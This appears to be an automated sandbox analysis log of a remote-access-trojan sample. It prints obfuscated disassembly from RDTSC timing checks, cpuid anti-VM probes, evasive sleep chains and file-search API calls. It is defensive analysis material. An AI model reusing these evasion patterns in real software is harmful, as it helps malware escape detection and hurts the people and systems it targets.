                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4D6526 second address: 4D65FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1593ED0h 0x00000004 neg cl 0x00000006 lea eax, dword ptr [C399C3E4h] 0x0000000c lea eax, dword ptr [ecx+0000D6D8h] 0x00000012 lea eax, dword ptr [eax+esi] 0x00000015 jmp 00007F8AB1593EBDh 0x00000017 not cl 0x00000019 bswap eax 0x0000001b mov dx, ax 0x0000001e mov dx, word ptr [esp] 0x00000022 bsr ax, dx 0x00000026 jmp 00007F8AB1593EEEh 0x00000028 jle 00007F8AB1593E58h 0x0000002a lea eax, dword ptr [edi-7CF34C86h] 0x00000030 shr dh, cl 0x00000032 jmp 00007F8AB1593E7Ah 0x00000034 add cl, FFFFFF99h 0x00000037 push edx 0x00000038 mov ax, word ptr [esp+02h] 0x0000003d mov dh, 51h 0x0000003f push ax 0x00000041 jmp 00007F8AB1593EBBh 0x00000043 xchg dword ptr [esp], eax 0x00000046 lea esp, dword ptr [esp+02h] 0x0000004a lea esp, dword ptr [esp+04h] 0x0000004e sub cl, FFFFFF88h 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4D6540 second address: 4D65FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE966h 0x00000004 neg cl 0x00000006 lea eax, dword ptr [C399C3E4h] 0x0000000c lea eax, dword ptr [ecx+0000D6D8h] 0x00000012 lea eax, dword ptr [eax+esi] 0x00000015 jmp 00007F8AB0DEE96Dh 0x00000017 not cl 0x00000019 bswap eax 0x0000001b mov dx, ax 0x0000001e mov dx, word ptr [esp] 0x00000022 bsr ax, dx 0x00000026 jmp 00007F8AB0DEE99Eh 0x00000028 jle 00007F8AB0DEE908h 0x0000002a lea eax, dword ptr [edi-7CF34C86h] 0x00000030 shr dh, cl 0x00000032 jmp 00007F8AB0DEE92Ah 0x00000034 add cl, FFFFFF99h 0x00000037 push edx 0x00000038 mov ax, word ptr [esp+02h] 0x0000003d mov dh, 51h 0x0000003f push ax 0x00000041 jmp 00007F8AB0DEE96Bh 0x00000043 xchg dword ptr [esp], eax 0x00000046 lea esp, dword ptr [esp+02h] 0x0000004a lea esp, dword ptr [esp+04h] 0x0000004e sub cl, FFFFFF88h 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 479B98 second address: 479C13 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, dword ptr [esp] 0x00000005 call 00007F8AB1593ED8h 0x0000000a lea eax, dword ptr [edi+0000880Fh] 0x00000010 mov cx, dx 0x00000013 mov cx, word ptr [esp] 0x00000017 rcl ecx, 0Ch 0x0000001a jmp 00007F8AB1593EC5h 0x0000001c add al, ch 0x0000001e xchg dword ptr [esp], ebx 0x00000021 not edx 0x00000023 mov cl, dh 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 479C13 second address: 4CFDF2 instructions: 0x00000000 rdtsc 0x00000002 lea eax, dword ptr [ecx-00004680h] 0x00000008 jmp 00007F8AB0E44AE6h 0x0000000d lea ebx, dword ptr [ebx+49h] 0x00000010 lea eax, dword ptr [ebx+esi] 0x00000013 dec edx 0x00000014 lea edx, dword ptr [eax+ebp] 0x00000017 xchg dx, ax 0x0000001a pushad 0x0000001b jmp 00007F8AB0DEE92Ch 0x0000001d xchg dword ptr [esp+20h], ebx 0x00000021 mov ax, si 0x00000024 lea edx, dword ptr [ecx+000000CEh] 0x0000002a shr dx, cl 0x0000002d jmp 00007F8AB0DEE986h 0x0000002f cmc 0x00000030 mov eax, dword ptr [esp] 0x00000033 push dword ptr [esp+20h] 0x00000037 retn 0024h 0x0000003a not ch 0x0000003c sub esp, 1Ah 0x0000003f jl 00007F8AB0E44B2Bh 0x00000045 jnl 00007F8AB0E44B85h 0x0000004b lea esp, dword ptr [esp+02h] 0x0000004f call 00007F8AB0DEE90Dh 0x00000054 xchg dx, cx 0x00000057 not ax 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4D42B5 second address: 4D42D0 instructions: 0x00000000 rdtsc 0x00000002 mov edx, dword ptr [esp] 0x00000005 and ah, 0000007Ah 0x00000008 xchg dword ptr [esp], ebp 0x0000000b jmp 00007F8AB1593F12h 0x0000000d bsf ax, dx 0x00000011 bswap edx 0x00000013 mov edx, 76495E28h 0x00000018 pushfd 0x00000019 lea ebp, dword ptr [ebp-0000001Bh] 0x0000001f bswap edx 0x00000021 jmp 00007F8AB1593E1Ch 0x00000026 mov ah, byte ptr [esp] 0x00000029 sub esp, 08h 0x0000002c dec dh 0x0000002e mov al, cl 0x00000030 xchg dword ptr [esp+0Ch], ebp 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4D42D0 second address: 4D431F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE979h 0x00000004 bsr dx, dx 0x00000008 bsf edx, esp 0x0000000b mov edx, 770EE750h 0x00000010 mov ah, dh 0x00000012 push dword ptr [esp+0Ch] 0x00000016 retn 0010h 0x00000019 mov cx, word ptr [ebp+00h] 0x0000001d mov eax, E6083829h 0x00000022 jmp 00007F8AB0DEE962h 0x00000024 pushfd 0x00000025 rcl dl, cl 0x00000027 jnl 00007F8AB0DEE9ABh 0x00000029 xchg dx, ax 0x0000002c jmp 00007F8AB0DEE9D1h 0x0000002e sub ebp, 02h 0x00000031 xchg dh, dl 0x00000033 lea edx, dword ptr [ebx-0000352Ah] 0x00000039 mov dx, D04Ah 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4D431F second address: 4D4367 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1593EE0h 0x00000004 add word ptr [ebp+04h], cx 0x00000008 not eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4E9BCB second address: 4E9CC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE92Dh 0x00000004 not dword ptr [ebp+00h] 0x00000007 mov ax, CF5Ah 0x0000000b push ecx 0x0000000c shr dh, 00000005h 0x0000000f jmp 00007F8AB0DEE9C0h 0x00000011 jle 00007F8AB0DEE966h 0x00000013 mov cx, word ptr [ebp+00h] 0x00000017 add eax, 9FCEE7F0h 0x0000001c jnc 00007F8AB0DEE96Dh 0x0000001e jc 00007F8AB0DEE96Bh 0x00000020 call 00007F8AB0DEE966h 0x00000025 pop dx 0x00000027 jmp 00007F8AB0DEE91Fh 0x00000029 mov dh, al 0x0000002b lea esp, dword ptr [esp+02h] 0x0000002f jmp 00007F8AB0DEE97Dh 0x00000031 sub ebp, 02h 0x00000034 mov dx, 8960h 0x00000038 xchg eax, edx 0x00000039 mov edx, dword ptr [esp] 0x0000003c jmp 00007F8AB0DEE9A0h 0x0000003e or word ptr [ebp+04h], cx 0x00000042 xchg ax, dx 0x00000044 lea edx, dword ptr [edx-00000AEDh] 0x0000004a mov ax, word ptr [esp] 0x0000004e jmp 00007F8AB0DEE91Eh 0x00000050 pushfd 0x00000051 pop dword ptr [ebp+00h] 0x00000054 lea edx, dword ptr [00000000h+edx*4] 0x0000005b mov edx, 457163FEh 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 48AF3C second address: 48B06E instructions: 0x00000000 rdtsc 0x00000002 lea esp, dword ptr [esp+03h] 0x00000006 call 00007F8AB1593E81h 0x0000000b jmp 00007F8AB1593EC5h 0x0000000d sub esp, 02h 0x00000010 neg ax 0x00000013 xchg dx, ax 0x00000016 rol edx, 1Ah 0x00000019 lea esp, dword ptr [esp+02h] 0x0000001d xchg dword ptr [esp], esi 0x00000020 jmp 00007F8AB1593EB7h 0x00000022 xchg ax, dx 0x00000024 sub esp, 04h 0x00000027 btr dx, bx 0x0000002b xchg word ptr [esp+01h], dx 0x00000030 mov dx, word ptr [esp+02h] 0x00000035 lea esi, dword ptr [esi+67h] 0x00000038 jmp 00007F8AB1593EF2h 0x0000003a lea eax, dword ptr [00000000h+ebp*4] 0x00000041 mov dh, ah 0x00000043 mov eax, esp 0x00000045 sub esp, 15h 0x00000048 lea esp, dword ptr [esp+01h] 0x0000004c xchg dword ptr [esp+18h], esi 0x00000050 jmp 00007F8AB1593E74h 0x00000052 mov ah, byte ptr [esp] 0x00000055 pushad 0x00000056 push ecx 0x00000057 push dword ptr [esp+3Ch] 0x0000005b retn 0040h 0x0000005e xor cl, FFFFFFC2h 0x00000061 bsr eax, ebx 0x00000064 jmp 00007F8AB1593EF1h 0x00000066 jp 00007F8AB1593EB6h 0x00000068 mov ax, si 0x0000006b mov dx, word ptr [esp] 0x0000006f jmp 00007F8AB1593F00h 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4E9C00 second address: 4E9D14 instructions: 0x00000000 rdtsc 0x00000002 call 00007F8AB0DEE934h 0x00000007 mov ecx, ebx 0x00000009 shr dh, 00000004h 0x0000000c mov ecx, EECE932Dh 0x00000011 mov dx, word ptr [esp] 0x00000015 jmp 00007F8AB0DEEA94h 0x0000001a xchg dword ptr [esp], esi 0x0000001d xchg edx, ecx 0x0000001f mov ax, di 0x00000022 lea edx, dword ptr [edx+edi] 0x00000025 mov dx, si 0x00000028 lea esi, dword ptr [esi-0000005Dh] 0x0000002e jmp 00007F8AB0DEE908h 0x00000030 dec ax 0x00000032 lea ecx, dword ptr [F092C92Eh] 0x00000038 xchg dword ptr [esp], esi 0x0000003b mov ecx, dword ptr [esp] 0x0000003e not eax 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4E9D14 second address: 4E9CC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1593E22h 0x00000004 push dword ptr [esp] 0x00000007 retn 0004h 0x0000000a not dword ptr [ebp+00h] 0x0000000d mov ax, CF5Ah 0x00000011 push ecx 0x00000012 shr dh, 00000005h 0x00000015 jmp 00007F8AB1593F10h 0x00000017 jle 00007F8AB1593EB6h 0x00000019 mov cx, word ptr [ebp+00h] 0x0000001d add eax, 9FCEE7F0h 0x00000022 jnc 00007F8AB1593EBDh 0x00000024 call 00007F8AB1593EB6h 0x00000029 pop dx 0x0000002b jmp 00007F8AB1593E6Fh 0x0000002d mov dh, al 0x0000002f lea esp, dword ptr [esp+02h] 0x00000033 jmp 00007F8AB1593ECDh 0x00000035 sub ebp, 02h 0x00000038 mov dx, 8960h 0x0000003c xchg eax, edx 0x0000003d mov edx, dword ptr [esp] 0x00000040 jmp 00007F8AB1593EF0h 0x00000042 or word ptr [ebp+04h], cx 0x00000046 xchg ax, dx 0x00000048 lea edx, dword ptr [edx-00000AEDh] 0x0000004e mov ax, word ptr [esp] 0x00000052 jmp 00007F8AB1593E6Eh 0x00000054 pushfd 0x00000055 pop dword ptr [ebp+00h] 0x00000058 lea edx, dword ptr [00000000h+edx*4] 0x0000005f mov edx, 457163FEh 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52A404 second address: 52A493 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 mov ax, word ptr [esp+01h] 0x00000008 lea edx, dword ptr [esi+45980130h] 0x0000000e mov dword ptr [esp], edi 0x00000011 jmp 00007F8AB0DEE922h 0x00000013 mov dx, word ptr [esp] 0x00000017 mov ax, 82A6h 0x0000001b mov dl, ah 0x0000001d jmp 00007F8AB0DEEB13h 0x00000022 lea edi, dword ptr [00000000h+ecx*4] 0x00000029 mov dx, word ptr [esp] 0x0000002d lea eax, dword ptr [esp+69177B39h] 0x00000034 pop edi 0x00000035 mov ax, bp 0x00000038 setle dl 0x0000003b jmp 00007F8AB0DEE810h 0x00000040 not dx 0x00000043 push edx 0x00000044 xchg dh, al 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52A493 second address: 52A499 instructions: 0x00000000 rdtsc 0x00000002 push word ptr [esp] 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D0C3 second address: 52D156 instructions: 0x00000000 rdtsc 0x00000002 lea eax, dword ptr [ebp+1Eh] 0x00000005 bsf bp, sp 0x00000009 pop dx 0x0000000b jmp 00007F8AB0DEE927h 0x0000000d mov edi, 6144D9A9h 0x00000012 mov word ptr [esp+01h], bx 0x00000017 add esp, 01h 0x0000001a jmp 00007F8AB0DEE96Eh 0x0000001c lea ecx, dword ptr [ecx+3F6DD35Ch] 0x00000022 lea esi, dword ptr [esp+0000F508h] 0x00000029 mov byte ptr [esp], dl 0x0000002c mov eax, dword ptr [esp] 0x0000002f not cl 0x00000031 mov ebp, dword ptr [esp] 0x00000034 jmp 00007F8AB0DEE9EBh 0x00000039 xchg ebp, esi 0x0000003b mov byte ptr [esp+01h], cl 0x0000003f mov dx, word ptr [esp] 0x00000043 mov dh, 38h 0x00000045 mov di, word ptr [esp] 0x00000049 sub esp, 14h 0x0000004c jmp 00007F8AB0DEE8F0h 0x0000004e xchg bp, dx 0x00000051 pop word ptr [esp+12h] 0x00000056 push word ptr [esp+03h] 0x0000005b pop edi 0x0000005c cmc 0x0000005d mov si, dx 0x00000060 jmp 00007F8AB0DEE91Eh 0x00000062 cmc 0x00000063 push dword ptr [esp+03h] 0x00000067 cld 0x00000068 add esp, 06h 0x0000006b neg dh 0x0000006d pop eax 0x0000006e jmp 00007F8AB0DEE98Eh 0x00000070 sub esp, 11h 0x00000073 mov word ptr [esp+18h], bp 0x00000078 pop dword ptr [esp+13h] 0x0000007c cpuid 0x0000007e push dword ptr [esp+19h] 0x00000082 cpuid 0x00000084 jmp 00007F8AB0DEE926h 0x00000086 dec cx 0x00000088 xchg bp, di 0x0000008b or dh, FFFFFFF5h 0x0000008e pop cx 0x00000090 pop cx 0x00000092 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D156 second address: 52D1B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1594038h 0x00000007 clc 0x00000008 rcl di, cl 0x0000000b bts ax, di 0x0000000f shl al, 00000000h 0x00000012 lea edx, dword ptr [00000000h+eax*4] 0x00000019 bswap esi 0x0000001b jmp 00007F8AB1593D84h 0x00000020 mov ebx, BC6819FEh 0x00000025 mov ebp, dword ptr [esp+15h] 0x00000029 mov cl, ah 0x0000002b btr ax, di 0x0000002f xchg dword ptr [esp+12h], edi 0x00000033 add ah, cl 0x00000035 jmp 00007F8AB1593E51h 0x00000037 not ah 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D48E second address: 52D476 instructions: 0x00000000 rdtsc 0x00000002 mov ah, byte ptr [esp] 0x00000005 mov dh, byte ptr [esp] 0x00000008 jmp 00007F8AB1593E7Ah 0x0000000a mov al, byte ptr [esp] 0x0000000d lea esp, dword ptr [esp] 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D476 second address: 52D543 instructions: 0x00000000 rdtsc 0x00000002 dec cl 0x00000004 not edx 0x00000006 std 0x00000007 jmp 00007F8AB0DEF090h 0x0000000c mov byte ptr [esp], bl 0x0000000f neg al 0x00000011 pushad 0x00000012 mov ebx, esi 0x00000014 xchg bp, bx 0x00000017 mov al, 3Bh 0x00000019 jmp 00007F8AB0DEE2C3h 0x0000001e stc 0x0000001f pop edi 0x00000020 xchg dword ptr [esp+07h], ebp 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D543 second address: 52D798 instructions: 0x00000000 rdtsc 0x00000002 bt edx, ecx 0x00000005 sub esp, 10h 0x00000008 jmp 00007F8AB1593E33h 0x0000000a xchg word ptr [esp+26h], si 0x0000000f lea ebx, dword ptr [00000000h+esi*4] 0x00000016 setnl dh 0x00000019 mov word ptr [esp+29h], cx 0x0000001e lea ecx, dword ptr [00000000h+eax*4] 0x00000025 lea eax, dword ptr [esp-000000ECh] 0x0000002c jmp 00007F8AB1593E52h 0x0000002e lea edi, dword ptr [esi+ebp] 0x00000031 std 0x00000032 xchg word ptr [esp+01h], bx 0x00000037 cld 0x00000038 mov ecx, ebp 0x0000003a mov dx, bp 0x0000003d jmp 00007F8AB1593EA6h 0x0000003f xchg dword ptr [esp+03h], esi 0x00000043 mov byte ptr [esp+19h], dl 0x00000047 call 00007F8AB1593EE9h 0x0000004c xchg cx, bx 0x0000004f popad 0x00000050 push word ptr [esp+08h] 0x00000055 pop ebx 0x00000056 jmp 00007F8AB1593E80h 0x00000058 cpuid 0x0000005a pop dx 0x0000005c sub esp, 00000000h 0x0000005f xchg dword ptr [esp+06h], eax 0x00000063 sbb bx, 6906h 0x00000068 jmp 00007F8AB1593EB2h 0x0000006a mov di, word ptr [esp+07h] 0x0000006f call 00007F8AB15941CEh 0x00000074 mov di, word ptr [esp+01h] 0x00000079 lea edx, dword ptr [ebp+00002BDCh] 0x0000007f pushfd 0x00000080 mov di, ax 0x00000083 pop word ptr [esp+0Fh] 0x00000088 jmp 00007F8AB1593DBEh 0x0000008d bsf bp, sp 0x00000091 xchg word ptr [esp+0Eh], bp 0x00000096 pop bp 0x00000098 mov ch, 02h 0x0000009a mov ch, dl 0x0000009c rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D798 second address: 52D551 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE75Eh 0x00000007 xchg dh, al 0x00000009 mov bx, cx 0x0000000c lea esi, dword ptr [ebx-7Fh] 0x0000000f pop si 0x00000011 mov ax, 8CB8h 0x00000015 lea edi, dword ptr [esp+0000A102h] 0x0000001c jmp 00007F8AB0DEE8FEh 0x0000001e rcr dl, 00000007h 0x00000021 xchg bp, cx 0x00000024 btc bp, di 0x00000028 lea ebx, dword ptr [edi+000012C5h] 0x0000002e pop bp 0x00000030 bsr bp, cx 0x00000034 jmp 00007F8AB0DEE91Ch 0x00000036 mov dx, D781h 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D551 second address: 52D6C5 instructions: 0x00000000 rdtsc 0x00000002 std 0x00000003 mov ch, byte ptr [esp+0Ah] 0x00000007 mov al, byte ptr [esp+05h] 0x0000000b mov byte ptr [esp+06h], dl 0x0000000f jmp 00007F8AB1593EC3h 0x00000011 pop edx 0x00000012 pop word ptr [esp+01h] 0x00000017 call 00007F8AB1593EA6h 0x0000001c mov eax, ebp 0x0000001e mov bh, AAh 0x00000020 mov bl, ah 0x00000022 add esp, 03h 0x00000025 jmp 00007F8AB1593EDDh 0x00000027 mov edi, dword ptr [esp+01h] 0x0000002b not ax 0x0000002e pop edi 0x0000002f mov edi, ebp 0x00000031 ror al, cl 0x00000033 bt edx, ebp 0x00000036 jmp 00007F8AB1593E7Bh 0x00000038 push word ptr [esp+03h] 0x0000003d cld 0x0000003e dec dl 0x00000040 mov ah, bl 0x00000042 pop word ptr [esp+01h] 0x00000047 jmp 00007F8AB1593F97h 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D6C5 second address: 52D667 instructions: 0x00000000 rdtsc 0x00000002 xchg bp, ax 0x00000005 lea esi, dword ptr [eax-000000E4h] 0x0000000b pop word ptr [esp] 0x0000000f clc 0x00000010 mov bp, sp 0x00000013 jmp 00007F8AB0DEE8A8h 0x00000018 push word ptr [esp] 0x0000001c mov eax, dword ptr [esp+02h] 0x00000020 mov byte ptr [esp+02h], cl 0x00000024 setp bh 0x00000027 xchg ebp, eax 0x00000029 xchg eax, ebx 0x0000002a jmp 00007F8AB0DEE90Ah 0x0000002c xchg dh, ah 0x0000002e sub esp, 1Eh 0x00000031 mov byte ptr [esp+12h], cl 0x00000035 xchg byte ptr [esp+1Eh], cl 0x00000039 not bh 0x0000003b mov byte ptr [esp+0Ah], bl 0x0000003f jmp 00007F8AB0DEE927h 0x00000041 lea eax, dword ptr [66EDA811h] 0x00000047 lea edi, dword ptr [00000000h+ebx*4] 0x0000004e popad 0x0000004f stc 0x00000050 jmp 00007F8AB0DEE96Ch 0x00000052 mov ecx, dword ptr [esp] 0x00000055 push cx 0x00000057 xchg bx, cx 0x0000005a add esp, 02h 0x0000005d mov word ptr [esp], di 0x00000061 std 0x00000062 jmp 00007F8AB0DEE989h 0x00000064 bsr bp, ax 0x00000068 clc 0x00000069 setbe bh 0x0000006c sub esp, 1Fh 0x0000006f mov ah, dl 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D667 second address: 52D64F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1593E7Bh 0x00000004 lea edi, dword ptr [esi-0000E5A0h] 0x0000000a cmc 0x0000000b not bh 0x0000000d cpuid 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4D431F second address: 4D4367 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE990h 0x00000004 add word ptr [ebp+04h], cx 0x00000008 not eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4E9BCB second address: 4E9CC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1593E7Dh 0x00000004 not dword ptr [ebp+00h] 0x00000007 mov ax, CF5Ah 0x0000000b push ecx 0x0000000c shr dh, 00000005h 0x0000000f jmp 00007F8AB1593F10h 0x00000011 jle 00007F8AB1593EB6h 0x00000013 mov cx, word ptr [ebp+00h] 0x00000017 add eax, 9FCEE7F0h 0x0000001c jnc 00007F8AB1593EBDh 0x0000001e jc 00007F8AB1593EBBh 0x00000020 call 00007F8AB1593EB6h 0x00000025 pop dx 0x00000027 jmp 00007F8AB1593E6Fh 0x00000029 mov dh, al 0x0000002b lea esp, dword ptr [esp+02h] 0x0000002f jmp 00007F8AB1593ECDh 0x00000031 sub ebp, 02h 0x00000034 mov dx, 8960h 0x00000038 xchg eax, edx 0x00000039 mov edx, dword ptr [esp] 0x0000003c jmp 00007F8AB1593EF0h 0x0000003e or word ptr [ebp+04h], cx 0x00000042 xchg ax, dx 0x00000044 lea edx, dword ptr [edx-00000AEDh] 0x0000004a mov ax, word ptr [esp] 0x0000004e jmp 00007F8AB1593E6Eh 0x00000050 pushfd 0x00000051 pop dword ptr [ebp+00h] 0x00000054 lea edx, dword ptr [00000000h+edx*4] 0x0000005b mov edx, 457163FEh 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 48AF3C second address: 48B06E instructions: 0x00000000 rdtsc 0x00000002 lea esp, dword ptr [esp+03h] 0x00000006 call 00007F8AB0DEE931h 0x0000000b jmp 00007F8AB0DEE975h 0x0000000d sub esp, 02h 0x00000010 neg ax 0x00000013 xchg dx, ax 0x00000016 rol edx, 1Ah 0x00000019 lea esp, dword ptr [esp+02h] 0x0000001d xchg dword ptr [esp], esi 0x00000020 jmp 00007F8AB0DEE967h 0x00000022 xchg ax, dx 0x00000024 sub esp, 04h 0x00000027 btr dx, bx 0x0000002b xchg word ptr [esp+01h], dx 0x00000030 mov dx, word ptr [esp+02h] 0x00000035 lea esi, dword ptr [esi+67h] 0x00000038 jmp 00007F8AB0DEE9A2h 0x0000003a lea eax, dword ptr [00000000h+ebp*4] 0x00000041 mov dh, ah 0x00000043 mov eax, esp 0x00000045 sub esp, 15h 0x00000048 lea esp, dword ptr [esp+01h] 0x0000004c xchg dword ptr [esp+18h], esi 0x00000050 jmp 00007F8AB0DEE924h 0x00000052 mov ah, byte ptr [esp] 0x00000055 pushad 0x00000056 push ecx 0x00000057 push dword ptr [esp+3Ch] 0x0000005b retn 0040h 0x0000005e xor cl, FFFFFFC2h 0x00000061 bsr eax, ebx 0x00000064 jmp 00007F8AB0DEE9A1h 0x00000066 jp 00007F8AB0DEE966h 0x00000068 mov ax, si 0x0000006b mov dx, word ptr [esp] 0x0000006f jmp 00007F8AB0DEE9B0h 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_024A7137 rdtsc 0_2_024A7137
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_10001667 SetupDiGetClassDevsA,SetupDiEnumDeviceInfo,GetLastError,SetupDiGetDeviceRegistryPropertyA,SetupDiGetDeviceRegistryPropertyA,GetLastError,GetLastError,GetLastError,LocalFree,GetLastError,_strcmpi,SetupDiSetClassInstallParamsA,GetLastError,SetupDiCallClassInstaller,GetLastError,SetupDiEnumDeviceInfo,GetLastError,SetupDiDestroyDeviceInfoList,SetLastError,0_2_10001667
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Window / User API: threadDelayed 6349
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Window / User API: threadDelayed 454
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_0-54154
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | API coverage: 7.0 %
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | API coverage: 1.9 %
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe TID: 6188 | Thread sleep count: 136 > 30
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe TID: 6188 | Thread sleep time: -544000s >= -30000s
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe TID: 6572 | Thread sleep count: 6349 > 30
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe TID: 6572 | Thread sleep time: -63490s >= -30000s
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe TID: 3524 | Thread sleep count: 165 > 30
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe TID: 3524 | Thread sleep time: -82500s >= -30000s
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe TID: 6188 | Thread sleep count: 454 > 30
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe TID: 6188 | Thread sleep time: -1816000s >= -30000s
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe TID: 3524 | Thread sleep count: 58 > 30
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Thread sleep count: Count: 6349 delay: -10
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_00409457 SHGetSpecialFolderPathA,FindFirstFileA,_mbscat,strlen,memcpy,strlen,0_2_00409457
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_1000140B SHGetSpecialFolderPathA,strcpy,strcat,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcat,strlen,memcpy,strlen,0_2_1000140B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_00409457 SHGetSpecialFolderPathA,FindFirstFileA,_mbscat,strlen,memcpy,strlen,4_2_00409457
